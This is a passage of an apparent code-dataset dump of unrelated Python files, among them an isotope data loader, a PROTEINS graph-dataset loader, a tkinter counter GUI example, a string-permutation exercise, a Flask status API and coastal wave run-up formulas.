\"isoMasses.txt\")\nisoDictMassLoc=os.path.join(DATA_PATH, \"isoDictMass.pkl\")\nisoDatadb=os.path.join(DATA_PATH, \"isoData.db\")\nisonavQR=os.path.join(DATA_PATH, \"isonavQR.png\")\nwMLoc=os.path.join(DATA_PATH, \"webMasses.txt\")\nchemTxt=os.path.join(DATA_PATH,\"materialTable.txt\")\nchemPkl=os.path.join(DATA_PATH,\"matTab.pkl\")\n\n#Isotope dictionary\niDict={}\nlistStuff=['n','H','He','Li','Be','B','C','N','O','F','Ne',\n 'Na','Mg','Al','Si','P','S','Cl','Ar','K','Ca',\n 'Sc','Ti','V','Cr','Mn','Fe','Co','Ni','Cu','Zn',\n 'Ga','Ge','As','Se','Br','Kr','Rb','Sr','Y','Zr',\n 'Nb','Mo','Tc','Ru','Rh','Pd','Ag','Cd','In','Sn',\n 'Sb','Te','I','Xe','Cs','Ba','La','Ce','Pr','Nd',\n 'Pm','Sm','Eu','Gd','Tb','Dy','Ho','Er','Tm','Yb',\n 'Lu','Hf','Ta','W','Re','Os',\n 'Ir','Pt','Au','Hg','Tl','Pb','Bi','Po','At','Rn',\n 'Fr','Ra','Ac','Th','Pa','U','Np','Pu','Am','Cm',\n 'Bk','Cf','Es','Fm','Md','No','Lr',\n 'Rf','Db','Sg','Bh','Hs','Mt','Ds','Rg',\n 'Cn','Ed','Fl','Ef','Lv','Eh','Ei']\n\nnameDict={'n':\"neutron\",'H':\"Hydrogen\",\"He\":\"Helium\",\"Li\":\"Lithium\",\n \"Be\":\"Berillium\",\"B\":\"Boron\",\"C\":\"Carbon\",\"N\":\"Nitrogen\",\n \"O\":\"Oxygen\",\"F\":\"Fluorine\",\"Ne\":\"Neon\",\"Na\":\"Sodium\",\n \"Mg\":\"Magnesium\",\"Al\":\"Aluminum\",\"Si\":\"Silicon\",\n \"P\":\"Phosphorus\",\"S\":\"Sulfur\",\"Cl\":\"Chlorine\",\"Ar\":\"Argon\",\n \"K\":\"Potassium\",\"Ca\":\"Calcium\",\"Sc\":\"Scandium\",\n \"Ti\":\"Titanium\",\"V\":\"Vanadium\",\"Cr\":\"Chromium\",\n \"Mn\":\"Manganese\",\"Fe\":\"Iron\",\"Co\":\"Cobalt\",\"Ni\":\"Nickel\",\n \"Cu\":\"Copper\",\"Zn\":\"Zinc\",\"Ga\":\"Gallium\",\"Ge\":\"Germanium\",\n \"As\":\"Arsenic\",\"Se\":\"Selenium\",\"Br\":\"Bromine\",\"Kr\":\"Krypton\",\n \"Rb\":\"Rubidium\",\"Sr\":\"Strontium\",\"Y\":\"Yttrium\",\"Zr\":\"Zirconium\",\n \"Nb\":\"Niobium\",\"Mo\":\"Molybdenum\",\"Tc\":\"Technetium\",\n \"Ru\":\"Ruthenium\",\"Rh\":\"Rhodium\",\"Pd\":\"Palladium\",\"Ag\":\"Silver\",\n \"Cd\":\"Cadmium\",\"In\":\"Indium\",\"Sn\":\"Tin\",\"Sb\":\"Antimony\",\n \"Te\":\"Tellurium\",\"I\":\"Iodine\",\"Xe\":\"Xenon\",\"Cs\":\"Cesium\",\n \"Ba\":\"Barium\",\"La\":\"Lanthanum\",\"Ce\":\"Cerium\",\"Pr\":\"Praseodymium\",\n \"Nd\":\"Neodymium\",\"Pm\":\"Promethium\",\"Sm\":\"Samarium\",\n \"Eu\":\"Europium\",\"Gd\":\"Gadolinium\",\"Tb\":\"Terbium\",\"Dy\":\"Dysprosium\",\n \"Ho\":\"Holmium\",\"Er\":\"Erbium\",\"Tm\":\"Thulium\",\"Yb\":\"Ytterbium\",\n \"Lu\":\"Lutetium\",\"Hf\":\"Hafnium\",\"Ta\":\"Tantalum\",\"W\":\"Tungsten\",\n \"Re\":\"Rhenium\",\"Os\":\"Osmium\",\"Ir\":\"Iridium\",\"Pt\":\"Platinum\",\n \"Au\":\"Gold\",\"Hg\":\"Mercury\",\"Tl\":\"Thallium\",\"Pb\":\"Lead\",\n \"Bi\":\"Bismuth\",\"Po\":\"Polonium\",\"At\":\"Astatine\",\"Rn\":\"Radon\",\n \"Fr\":\"Francium\",\"Ra\":\"Radium\",\"Ac\":\"Actinium\",\"Th\":\"Thorium\",\n \"Pa\":\"Protactinium\",\"U\":\"Uranium\",\"Np\":\"Neptunium\",\"Pu\":\"Plutonium\",\n \"Am\":\"Americium\",\"Cm\":\"Curium\",\"Bk\":\"Berkellium\",\n \"Cf\":\"Californium\",\"Es\":\"Einsteinium\",\"Fm\":\"Fermium\",\"Md\":\"Mendelevium\",\n \"No\":\"Nobelium\",\"Lr\":\"Lawrencium\",\"Rf\":\"Rutherfordium\",\n \"Db\":\"Dubnium\",\"Sg\":\"Seaborgium\",\"Bh\":\"Bohrium\",\"Hs\":\"Hassium\",\n \"Mt\":\"Meitnerium\",\"Ds\":\"Darmstadtium\",\"Rg\":\"Roentgenium\",\n \"Cn\":\"Copernicium\",\"Ed\":\"Ununtrium\",\"Fl\":\"Flerovium\",\"Ef\":\"Ununpentium\",\n \"Lv\":\"Livermorium\",\"Eh\":\"Ununseptium\",\"Ei\":\"Ununoctium\"}\n\n# if not os.path.isfile(isoDictLoc):\n# lines = [line.strip().split() for line in open(isoMassesLoc)]\n\ndef populateDict1():\n lines = [line.strip().split() for line in open(isoMassesLoc)]\n listLen=len(listStuff)\n #iDict[e][0]==proton number\n iDict['None']=[0,{0:[0]}]\n for i in range(listLen):\n iDict[listStuff[i]]=[i,{}]\n for j in lines:\n if i == int(j[0]):\n iDict[listStuff[i]][1][int(j[1])]=[float(j[2])]\n return iDict\n\ndef populateDict2(iDict):\n listLen=len(listStuff)\n #iDict[e][0]==proton number\n enxList=putIsoData()\n lines = [line.strip().split() for line in open(isoMassesLoc)]\n for i in range(listLen):\n for j in lines:\n if i == int(j[0]):\n fName=getFileName(enxList,listStuff[i],int(j[1]))\n if not fName:\n # iDict[listStuff[i]][1][int(j[1])].append([])\n continue\n fName=\"excitedData/\"+fName\n pDPart=enxParse(fName)\n iDict[listStuff[i]][1][int(j[1])].append(pDPart)\n # if j <=3:\n # print iDict[listStuff[i]][1][int(j[1])]\n return iDict\n\ndef getFileName(aList,key,iso):\n for e in aList:\n if e[0]==key and e[1]==iso:\n return e[2]\n return False\n\ndef populateDict():\n if os.path.isfile(isoDictLoc):\n # print \"#Dictionary file exists, loading it\"\n iDict = pickle.load(open(isoDictLoc, \"rb\" ))\n else:\n print(\"#Dictionary file does not exist, creating it\")\n iDict=populateDict1()\n iDict=populateDict2(iDict)\n pickle.dump(iDict,open(isoDictLoc,\"wb\"),2)\n return iDict\n\ndef fastPopulateDict():\n if os.path.isfile(isoDictMassLoc):\n # print \"#Dictionary file exists, loading it\"\n iDict = pickle.load(open(isoDictMassLoc, \"rb\" ))\n else:\n print(\"#Dictionary file does not exist, creating it\")\n iDict=populateDict1()\n pickle.dump(iDict,open(isoDictMassLoc,\"wb\"),2)\n return iDict\n\ndef putIsoData():\n isoVal=getIsoVal()\n filterList=[]\n for e in isoVal:\n #Ignoring weird enx files\n if '_' not in e[0] and not e[0].isdigit():\n boolVal=e[1] in iDict[e[0]][1]\n if boolVal:\n # print e, boolVal\n filterList+=[e]\n return filterList\n\ndef index(string,char):\n \"\"\"Finds the index of the first char that is found\"\"\"\n for i in range(len(string)):\n if string[i]==char:\n return i\n return -1\n\ndef getIsoVal():\n return [[f[3:index(f,'.')],int(f[0:3]),f] for f in listdir('excitedData')\\\n if isfile(join('excitedData',f))]\n\ndef generateIsoMfromWebM():\n FILE = open(isoMassesLoc,\"w\")\n lines = [line.strip().split() for line in open(wMLoc)]\n for line in lines:\n #Omitting empty lines and beginning with #\n if len(line)>0 and line[0][0] != '#':\n massP2=line[-2]\n # if '#' in massP2:\n # continue #Omitting this values\n newMassP2 = massP2.replace(\".\", \"\")\n newerMassP2 = newMassP2.replace(\"#\", \"\")\n massP1= line[-3]\n mass=float(massP1+\".\"+newerMassP2)\n if line[4].isdigit():\n symbol=line[5]\n aVal=int(line[4])\n pVal=int(line[3])\n else:\n symbol=line[4]\n aVal=int(line[3])\n pVal=int(line[2])\n myString=str(pVal)+\"\\t\\t\"+str(aVal)+\"\\t\"+str(mass)+\"\\n\"\n print(myString)\n FILE.write(myString)\n FILE.close()\n# print isoVal\n# print len(isoVal)\n\ndef getChemDict(chemTxtFile):\n \"\"\"Loads a txt file with the properties for the energy loss\n calculations\"\"\"\n with open(chemTxtFile) as chemFile:\n theLines=chemFile.readlines()\n\n chemDict={}\n for line in theLines:\n if line[0] == '#':\n continue\n myList=line.split()\n if len(myList) > 0:\n symbol=myList[0]\n Z=int(myList[1])\n A_r=myList[2]\n if A_r[0] == '(':\n A_r=A_r[1:-1]\n A_r=float(A_r)\n density=myList[5]\n I=myList[-1]\n if density != '-':\n density=float(density)\n if I != '-':\n I=float(I)\n chemDict[symbol]=[Z,A_r,density,I]\n return chemDict\n\n#If the material database has to be modified then edit the txt file and\n#then run this command inside the repo's folder: saveChemDat()\n####################DON'T FORGET TO REINSTALL!!!!!#############\ndef saveChemDat():\n print(\"Creating the pickle file for chemDat\")\n chemDict=getChemDict(chemTxt)\n #Specifying protocol 2 since 3 is backwards incompatible\n pickle.dump(chemDict,open(chemPkl,\"wb\"),2)\n\ndef getChemDictFromFile():\n chemDict=pickle.load(open(chemPkl,\"rb\"))\n return chemDict\n\n\n# The nist file for abundances and masses etc. is located at:\n# https://physics.nist.gov/cgi-bin/Compositions/stand_alone.pl?ele=&all=all&ascii=ascii2\n# And the URL that generated it is:\n#https://www.nist.gov/pml/atomic-weights-and-isotopic-compositions-relative-atomic-masses\n#Where the all elements, linearized output and all isotopes options were marked.\ndef parseNistFile(nistFile):\n #return NISTDict\n pass\n\ndef pickleNistDict(nistDict):\n #Do a saving ...\n pass\n\ndef getNistDict():\n #Do unpickling here, probably will replace other parts (like the masses)\n pass\n","repo_name":"ffavela/isonav","sub_path":"loadingStuff.py","file_name":"loadingStuff.py","file_ext":"py","file_size_in_byte":9361,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"33099029779","text":"import os, sys\nimport platform\n\nnode_num = int(platform.node().split(\"emerald\")[-1]) - 1\n\ndef search_dir(aDirname):\n filelist = []\n filenames = os.listdir(aDirname)\n for filename in filenames:\n full_filename = os.path.join(aDirname, filename)\n ext = os.path.splitext(full_filename)[-1]\n filelist.append(full_filename)\n\n return filelist\n\ndef search(aDirname, aType):\n filelist = []\n filenames = os.listdir(aDirname)\n for filename in filenames:\n full_filename = os.path.join(aDirname, filename)\n ext = os.path.splitext(full_filename)[-1]\n if ext == aType:\n filelist.append(full_filename)\n\n return filelist\n\n\n\nroot_path = \"/scratch/jmmoon/SubregionBlock/\"\n\ndirlist = search_dir(root_path)\ndirlist.sort()\n\nfor p in dirlist:\n\tname = p.split(root_path)[-1]\n\tsave_path = root_path + name +\"/\"\n\t#print (\"./build/app \" + str(node_num) + \" \" + save_path)\n\tos.system(\"./build/app \" + str(node_num) + \" \" + save_path)\n\n\n\n","repo_name":"MoonJungmin/ZebrafishAnalytics_Dataprocessing","sub_path":"VA_DataGenerate/EM_yzzxmultilevel/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2412125885","text":"import torch\nimport numpy as np\nfrom ast import literal_eval\n\nimport networkx as nx\nfrom sklearn.model_selection import StratifiedKFold\nclass Graph0:\n def __init__(self, graph, nodes):\n self.graph = graph.to('cuda') # Ajacency Matrix\n self.nodes = nodes.to('cuda') # means C, N, ... Br\n self.label = label.to('cuda')\n\nclass Graph:\n def __init__(self, nx_graph):\n self.nx_graph = nx_graph\n self.neighbors = []\n self.max_degree = None\n self.node_labels = []\n self.node_features = []\n self.node_attributes = []\n self.edges = []\n self.label = None\n\ndef separate_data(graph_list, seed, fold_idx):\n assert 0 <= fold_idx and fold_idx < 10, \"fold_idx must be from 0 to 9.\"\n skf = StratifiedKFold(n_splits=10, shuffle = True, random_state = seed)\n\n labels = [graph.label for graph in graph_list]\n idx_list = []\n for idx in skf.split(np.zeros(len(labels)), labels):\n idx_list.append(idx)\n train_idx, test_idx = idx_list[fold_idx]\n\n train_graph_list = [graph_list[i] for i in train_idx]\n test_graph_list = [graph_list[i] for i in test_idx]\n\n return train_graph_list, test_graph_list\n\ndef load_data_table():\n graph_idx_file = '../dataset/PROTEINS/PROTEINS_graph_indicator.txt'\n adjacency_file = '../dataset/PROTEINS/PROTEINS_A.txt'\n node_label_file = '../dataset/PROTEINS/PROTEINS_node_labels.txt'\n node_attribute_file = '../dataset/PROTEINS/PROTEINS_node_attributes.txt'\n graph_label_file = '../dataset/PROTEINS/PROTEINS_graph_labels.txt'\n\n graph_list = []\n\n \n graph_size_list = []\n \n cur_g_idx = 0\n cur_size = 0\n graph_list.append(Graph(nx.Graph()))\n with open(graph_idx_file) as fp:\n for line in fp.readlines():\n if int(line) - 1 == cur_g_idx:\n cur_size += 1\n graph_list[cur_g_idx].nx_graph.add_node(cur_size)\n else:\n graph_list.append(Graph(nx.Graph()))\n graph_size_list.append(cur_size)\n cur_g_idx = int(line) - 1\n cur_size = 1\n graph_list[cur_g_idx].nx_graph.add_node(cur_size)\n graph_size_list.append(cur_size)\n\n assert len(list(graph_list[-1].nx_graph.nodes)) == cur_size\n\n\n graph_idx = 0\n pre_sum = 0\n size_sum = graph_size_list[graph_idx] \n with open(adjacency_file) as fp:\n for line in fp.readlines():\n edge = literal_eval(line)\n if edge[0] > size_sum or edge[1] > size_sum:\n graph_idx += 1\n pre_sum = size_sum\n size_sum += graph_size_list[graph_idx]\n graph_list[graph_idx].nx_graph.add_edge(edge[0] - pre_sum, edge[1] - pre_sum)\n\n \n assert len(list(graph_list[0].nx_graph.edges)) == 81\n assert len(list(graph_list[1].nx_graph.nodes)) == graph_size_list[1]\n\n graph_idx = 0\n size = 0\n node_idx = 0\n graph = None\n node_label_map = {}\n with open(node_label_file) as fp1:\n with open(node_attribute_file) as fp2:\n for node_label, node_attribute in zip(fp1.readlines(), fp2.readlines()):\n if not node_label in node_label_map:\n mapped_label = len(node_label_map)\n node_label_map[node_label] = mapped_label\n # 当前graph的node已填满 或者node_idx == size == 0,需初始化size和nodes\n if node_idx == size:\n graph = graph_list[graph_idx]\n size = graph_size_list[graph_idx]\n node_idx = 0\n graph_idx += 1\n graph.node_labels.append(node_label_map[node_label])\n graph.node_attributes.append(float(node_attribute))\n node_idx += 1\n assert len(graph_list[-1].node_labels) == graph_size_list[-1]\n\n for i, graph in enumerate(graph_list):\n neighbors = [[] for i in range(len(graph.nx_graph))]\n edges = [[edge[0]-1, edge[1]-1] for edge in graph.nx_graph.edges]\n for i, j in edges:\n neighbors[i].append(j)\n neighbors[j].append(i)\n graph.neighbors = neighbors\n\n degree_list = []\n for i in range(len(graph.nx_graph)):\n degree_list.append(len(neighbors[i]))\n graph.max_degree = max(degree_list)\n\n edges.extend([[j, i] for i, j in edges])\n graph.edges = torch.LongTensor(edges).transpose(0,1)\n\n graph.node_features = torch.zeros(len(graph.node_labels), len(node_label_map))\n graph.node_features[range(len(graph.node_labels)), [node_label for node_label in graph.node_labels]] = 1\n\n\n label_map = {}\n \n with open(graph_label_file) as fp:\n for graph_idx, graph_label in enumerate(fp.readlines()):\n if not graph_label in label_map:\n mapped_label = len(label_map)\n label_map[graph_label] = mapped_label\n \n graph_list[graph_idx].label = label_map[graph_label]\n\n return graph_list, len(label_map)\n\n\ndef load_data():\n graph_idx_file = '../dataset/PROTEINS/PROTEINS_graph_indicator.txt'\n adjacency_file = '../dataset/PROTEINS/PROTEINS_A.txt'\n node_label_file = '../dataset/PROTEINS/PROTEINS_node_labels.txt'\n node_attribute_file = '../dataset/PROTEINS/PROTEINS_node_attributes.txt'\n graph_label_file = '../dataset/PROTEINS/PROTEINS_graph_labels.txt'\n\n adjacency_list = []\n graph_size_list = []\n\n cur_g_idx = 1\n cur_size = 0\n\n with open(graph_idx_file) as fp:\n for line in fp.readlines():\n if int(line) == cur_g_idx:\n cur_size += 1\n else:\n adjacency_list.append(torch.zeros(cur_size, cur_size))\n graph_size_list.append(cur_size)\n cur_size = 1\n cur_g_idx = int(line)\n adjacency_list.append(torch.zeros(cur_size, cur_size))\n graph_size_list.append(cur_size)\n\n # print(graph_size_list[:3]) # [42, 27, 10]\n size_sum = 0\n\n graph_idx = 0\n pre_sum = 0\n size_sum += graph_size_list[graph_idx] \n with open(adjacency_file) as fp:\n for line in fp.readlines():\n edge = literal_eval(line)\n if edge[0] > size_sum or edge[1] > size_sum:\n graph_idx += 1\n pre_sum = size_sum\n size_sum += graph_size_list[graph_idx]\n adjacency_list[graph_idx][edge[0] - 1 - pre_sum, edge[1] - 1 - pre_sum] = 1.0\n\n # print(graph_list[0].sum()) # tensor(162.)\n\n dim = 4\n graph_idx = 0\n size = 0\n node_idx = 0\n node_list = []\n with open(node_label_file) as fp1:\n with open(node_attribute_file) as fp2:\n for node_label, node_attribute in zip(fp1.readlines(), fp2.readlines()):\n # 当前graph的node已填满 或者node_idx == size == 0,需初始化size和nodes\n if node_idx == size:\n size = graph_size_list[graph_idx]\n nodes = torch.zeros(size, dim)\n node_idx = 0\n graph_idx += 1\n \n node_label = int(node_label)\n node_attribute = float(node_attribute)\n node_val = 1.0\n if node_label == 0:\n nodes[node_idx] = torch.tensor([node_val, 0.0, 0.0, node_attribute])\n elif node_label == 1:\n nodes[node_idx] = torch.tensor([0.0, node_val, 0.0, node_attribute])\n else:\n nodes[node_idx] = torch.tensor([0.0, 0.0, node_val, node_attribute])\n\n node_idx += 1\n\n if node_idx == size:\n node_list.append(nodes)\n\n # print(node_list[0].shape) # torch.Size([42, 4])\n\n graph_list = []\n label_list = []\n \n with open(graph_label_file) as fp:\n for graph_idx, graph_label in enumerate(fp.readlines()):\n \n graph_label = torch.tensor([float(graph_label) - 1.0])\n label_list.append(graph_label)\n # if graph_label == '1':\n # label_list.append(torch.tensor([1.0, 0.0]).to('cuda'))\n # else:\n # label_list.append(torch.tensor([0.0, 1.0]).to('cuda'))\n\n graph_list.append(Graph0(adjacency_list[graph_idx], node_list[graph_idx], graph_label))\n \n return graph_list, label_list\n \n# import os \nif __name__ == \"__main__\":\n # test loading graph_idx_file\n\n _, classes = load_data_table()\n \n\n\n # os.chdir('DeepGraphFramework/GraphIsomorphismNetwork/src')\n # molecule_list, label_list = load_data() # data includes Ajacency and node_info \n\n # molecule0 = molecule_list[0] \n\n # print(molecule0.nodes)\n # print(molecule0.graph[0, :])\n # print(torch.mm(molecule0.graph, molecule0.nodes))\n \n\n \n\n\n\n\n\n\n \n\n","repo_name":"cleverer123/GraphIsomorphism_Torch","sub_path":"src/load_proteins.py","file_name":"load_proteins.py","file_ext":"py","file_size_in_byte":8860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41007777631","text":"'''\nRose Williams\nrosew@binghamton.edu\nGUI and MVC example\n'''\n\n'''\nVirtual counter GUI\nAllows user to count up or down using buttons, reset counter using button,\n and set counter by entering value and pressing on keyboard\nOutput:\n value of counter displayed in Label (int)\nInput:\n value of counter entered into Entry box (int)\nTasks:\n Create GUI with\n Model -\n counter (Counter)\n Controllers -\n buttonUp, buttonDown, buttonReset (Button)\n entry (Entry)\n View -\n value (Label)\n countUp()\n countDown()\n reset()\n set()\n'''\n\nfrom tkinter import * #All classes in GUI module\nfrom Counter import Counter #Model class\n\n# Provides GUI representation (View and Controller) of counter (Model)\nclass CounterGUI:\n # --------------------------------------------------------------------------\n # Constructor\n\n # Creates instance of Model class (Counter), creates, configures, and\n # places all Controller and View widgets, and starts listener\n def __init__(self):\n # Create main window\n self.__win = Tk()\n\n # Create Controller frames\n self.__top = Frame(self.__win)\n self.__mid = Frame(self.__win)\n \n # Create View frame\n self.__bottom = Frame(self.__win)\n \n # Create Model\n self.__counter = Counter()\n\n # Create, configure, and place Up/Down button controls in top frame(part of Controller)\n # Clicking Up button will invoke countUp() method\n self.__buttonUp = Button(self.__top, text = \"C O U N T U P !\", command = self.countUp)\n self.__buttonUp.pack(side = 'left')\n # Clicking Down button will invoke countDown() method\n self.__buttonDown = Button(self.__top, text = \"C O U N T D O W N !\", command = self.countDown)\n self.__buttonDown.pack(side = 'right')\n\n # Create, configure, and place Reset button control in middle frame (part of Controller)\n # Clicking Reset button will invoke reset() method\n self.__buttonReset = Button(self.__mid, text = \" RESET Counter \", command = self.reset)\n # Create, configure, and place prompt and entry box control in middle frame (part of Controller)\n # Typing a value in entry box and pressing on the keyboard will invoke set() method\n self.__prompt = Label(self.__mid, text = 'Set Counter: ')\n self.__entry = Entry(self.__mid, width = 7)\n self.__entry.bind('', self.set)\n\n self.__buttonReset.pack(side = 'left')\n self.__prompt.pack(side = 'left')\n self.__entry.pack(side = 'left')\n\n # Create, configure, and place IntVar and labels to display Model data in bottom frame (part of View)\n # Label output\n self.__label = Label(self.__bottom, text = 'Count = ')\n # Create IntVar to hold string representation of current value of counter\n self.__iVal = IntVar()\n self.__iVal.set(self.__counter.getValue())\n # Create label to display IntVar\n self.__value = Label(self.__bottom, textvariable = self.__iVal)\n\n self.__label.pack(side = 'left')\n self.__value.pack(side = 'right')\n\n # Place frames vertically from top to bottom\n self.__top.pack()\n self.__mid.pack()\n self.__bottom.pack()\n\n # Enter the Tkinter main loop\n mainloop()\n \n # countUp() - causes counter to be incremented and modifies StringVar (View) accordingly (mutator)\n def countUp(self):\n self.__counter.increment() # Note that the model takes care of its own state, here it is incrementing\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n\n # countDown() - causes counter to be decremented and modifies StringVar (View) accordingly (mutator)\n def countDown(self):\n self.__counter.decrement() # Note that the model takes care of its own state, here it is decrementing\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n\n # reset() - causes counter to be re-initialized and modifies StringVar (View) accordingly (mutator)\n def reset(self):\n self.__counter.reset() # Note that the model takes care of its own state, here it is re-initializing its state\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n\n # set() - causes counter to be set to value entered into entry box and modifies IntVar (View) accordingly (mutator)\n # param: event - produced when user presses \n def set(self, event):\n newValue = int (self.__entry.get()) # Get value that was entered into entry box\n # Note that newValue is NOT named self.__newValue because it is a local variable, NOT an instance variable\n # ONLY instance variables (which must be initialized in the constructor) are to use the self.__ naming convention\n self.__counter.set(newValue) # Have the model use the value to modify itself\n self.__iVal.set(self.__counter.getValue()) # Get the new value from the model and display it\n self.__entry.delete(0, END) # Clear entry box\n \n# Create a CounterGUI object\nCounterGUI()\n","repo_name":"JaehoonKang/Computer_Science_110_Python","sub_path":"GUI_example/GuiCounterDemo.py","file_name":"GuiCounterDemo.py","file_ext":"py","file_size_in_byte":4956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43920243421","text":"# Given two strings of characters, write a function that returns \n# wether or not two strings are permutations of eahother\n# Example 1: \"Hello\" and \"eHlol\" returns \"These are permutations of eachother\"\n# Example 2: \"Hello\" and \"eHlal\" returns \"These are not permutations\"\n\ndef permutationn(string1, string2):\n result = \"\"\n if len(string1) != len(string2):\n print(\"Different size\")\n\n else:\n for letter in string1:\n if letter in string2:\n string2 = string2.replace(letter, \"\", 1)\n continue\n else:\n result = \"These are not permutations\"\n print(\"Character \", letter, \" from string 1 not found in string 2\")\n break\n if result == \"\":\n print(\"These are permutations of eachother\")\n else:\n print(result)\n\nstring1 = \"Holo\"\nstring2 = \"Halo\"\npermutationn(string1, string2)\n","repo_name":"miniquinox/Coding-challenges","sub_path":"Dynatrace 1 - Hello Holel.py","file_name":"Dynatrace 1 - Hello Holel.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17121425174","text":"#!flask/bin/python\nfrom flask import Flask\nfrom flask import Response\n\nimport datetime, os, json\n\n# Get uptime for service\nstartTime = datetime.datetime.now()\ndef getUptime():\n\treturn str(datetime.datetime.now() - startTime)\n\n# Count number of requests to status\nstatusRequestCt = 0\n\ndef getStatusCounter():\n\tglobal statusRequestCt\n\tstatusRequestCt += 1\n\treturn statusRequestCt\n\n# Get the date/time of when the first request was made\n# Read file contents to first run timestamp. If does not find file (created when date called), create a new file with timestamp\ndirPath = os.path.dirname(os.path.abspath(__file__))\ndef getInitialStatusReqDateTime():\n\ttry:\n\t\treturn readInitialStatusRequestDateTime()\n\texcept:\n\t\treturn initializeHistoryFile()\n\n# Create a new file to hold record incase of service failure || restart. It is initialized with the total endpoint count and current server time\ndef initializeHistoryFile():\n\tinitialDateTime = datetime.datetime.now()\n\twith open(dirPath + '/history.json', 'w+') as output:\n\t\tjson.dump({'initialDateTime': str(initialDateTime), 'totalEndPointRequests': 0}, output)\n\t\treturn str(initialDateTime)\n\n# initializeHistoryFile()\n# Read data from history file stored with api\ndef readInitialStatusRequestDateTime():\n\twith open(dirPath + '/history.json') as file:\n\t\tdata = json.load(file)\n\t\treturn data['initialDateTime']\n\ndef updateTotalEndpoints():\n\twith open(dirPath + '/history.json', 'r+') as file:\n\t\tdata = json.load(file)\n\t\ttmp = data['totalEndPointRequests']\n\t\tdata['totalEndPointRequests'] = tmp + 1\n\t\tfile.seek(0)\n\t\tjson.dump(data, file)\n\t\treturn data['totalEndPointRequests']\n\n# updateTotalEndpoints()\n\napp = Flask(__name__)\n\n@app.route('/status')\ndef status():\n\n\tdata = {\n\t\t'serviceUptime': getUptime(),\n\t\t'serviceEndPointRequests': getStatusCounter(),\n\t\t'initialDateTime': getInitialStatusReqDateTime(),\n\t\t'totalEndPointRequests': updateTotalEndpoints()\n\t}\n\n\tresponse = Response(json.dumps(data), status=200, mimetype='application/json')\n\n\treturn response\n\napp.run(host='0.0.0.0', port=4000)","repo_name":"PatrickHauke/bomoda_engineering_test","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2466202769","text":"# O(|V| + |E|) time | O(|V|) space\n# (space time correct?)\ndef find_graph_components():\n input_graph = read_input()\n adj_list = construct_adjacency_list(input_graph)\n components = get_components(adj_list)\n write_output(components)\n\n\ndef get_components(adj_list):\n components = []\n visited = set()\n for vertex, neighbours in adj_list.items():\n if vertex in visited:\n continue\n component = [vertex]\n visited.add(vertex)\n for neighbour in neighbours:\n if neighbour not in visited:\n dfs(adj_list, visited, neighbour, component)\n components.append(component)\n return components\n\n\ndef dfs(adj_list, visited, vertex, component):\n visited.add(vertex)\n component.append(vertex)\n if vertex not in adj_list:\n return\n for neighbour in adj_list[vertex]:\n if neighbour not in visited:\n dfs(adj_list, visited, neighbour, component)\n\n\ndef read_input():\n with open(\"input.txt\") as input:\n lines = input.readlines()\n return lines\n\n\ndef construct_adjacency_list(input_graph):\n adj_list = {}\n params = input_graph[0].split()\n vertex_n, edges_n = int(params[0]), int(params[1])\n for i in range(vertex_n):\n adj_list[i + 1] = []\n for i in range(1, len(input_graph)):\n edge = input_graph[i].split()\n if len(edge) == 0:\n break\n vertex_from = int(edge[0])\n vertex_to = int(edge[1])\n adj_list[vertex_from].append(vertex_to)\n if vertex_from != vertex_to:\n adj_list[vertex_to].append(vertex_from)\n return adj_list\n\n\ndef write_output(components):\n with open('output.txt', 'w') as output:\n output.write(str(len(components)) + \"\\n\")\n for component in components:\n vertex_sequence = [str(vertex) for vertex in component]\n output.write(str(len(vertex_sequence)) + \"\\n\")\n output.write(\" \".join(vertex_sequence) + \"\\n\")\n\n\nfind_graph_components()\n","repo_name":"varvarakoshman/yandex_algorithms_workout_contest","sub_path":"graphs/dfs-related/SearchForComponents.py","file_name":"SearchForComponents.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"25672284191","text":"# Wave run-up: \"old Delft formula\"\ndef wrun_up_old(wperiod, wheight, slope):\n import numpy as np \n import matplotlib.pyplot as plt\n dike_slope = 1 / slope\n wlength0 = 1.56 * wperiod**2\n wsteepness = wheight / wlength0\n \n wrunup_old = 8 * wheight * dike_slope\n \n print(f\"\\nWave run-up ('Old Delft' formula): {wrunup_old:.2f} (m)\\n\")\n fig, (a0, a1) = plt.subplots(1,2, figsize = (21, 5),\n gridspec_kw={'width_ratios': [1, 5]})\n a0.plot(wsteepness, wheight, 'h', color='gray',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2)\n a0.set_xlim(0, 0.1)\n a0.set_ylim(0, 10)\n a0.set_xticks(np.linspace(0, 0.1, 6))\n a0.set_yticks(np.linspace(0, 10, 11))\n a0.set_xlabel('$H/L$ (-)')\n a0.set_ylabel('$H_s$ (m)')\n a0.grid()\n a1.plot(wrunup_old, wheight, 'd', color='blue',\n markersize=15, markerfacecolor='green',\n markeredgecolor='black', markeredgewidth=2)\n a1.set_xlim(0, 140)\n a1.set_ylim(0, 10)\n a1.set_xticks(np.linspace(0, 150, 31))\n a1.set_yticks(np.linspace(0, 10, 11))\n a1.set_xlabel('Wave Run-up: Old Delft Formula (m)')\n a1.set_ylabel('$H_s$ (m)')\n a1.grid()\n return\n\n# Wave run-up: CUR-TAW\ndef wrun_up_curtaw(wperiod, wheight, wangle, slope, slope_roughness, berm):\n import numpy as np \n import matplotlib.pyplot as plt\n # Library parameters\n dike_slope = 1 / slope\n # wave period and steepness\n wperiod_m10 = wperiod * 0.9\n wlength = 1.56 * wperiod_m10**2\n wsteepness = wheight / wlength\n # breaking parameter\n break_par = dike_slope / np.sqrt(wsteepness)\n # Slope 